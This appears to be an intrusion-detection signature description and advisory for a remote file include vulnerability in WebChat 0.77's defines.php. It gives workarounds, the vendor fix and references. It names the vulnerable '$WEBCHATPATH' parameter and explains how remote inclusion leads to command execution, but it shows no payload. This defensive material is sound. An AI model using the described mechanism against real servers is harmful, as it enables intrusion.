HTTP Webchat defines.php File Include

Description

This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the Webchate defines.php script.

Additional Information

WebChat is a chat application for JavaScript compatible web browsers written in PHP.

Webchat is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.

This vulnerability is as a result of insufficient sanitization performed on remote user supplied data used by a URI parameter of the 'defines.php' PHP page. Under some circumstances, it is possible for remote attackers to influence the path for 'db_mysql.php' and 'english.php' include files to point to an external file by manipulating the '$WEBCHATPATH' URI parameter.

If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

This vulnerability was reported for WebChat 0.77. It is not known if other versions are affected.

Affected

• Webdev Webchat 0.77

Response

Workaround:

Exploitation of this type of vulnerability may not be possible unless both the 'allow_url_fopen' and 'register_globals' directives are enabled in the local site PHP configuration. Modify the PHP configuration file, php.ini, to disable unneeded directives.

An unofficial unsupported patch can be found at: PHPSecure.info

Solution:

The vendor has released a fix to address this issue:

Webdev Webchat 0.77:
Webdev Upgrade Webchat 0.78

Possible False Positives

There are no known false positives associated with this signature.

Additional References

• SecurityFocus BID: 7000
• Webchat Homepage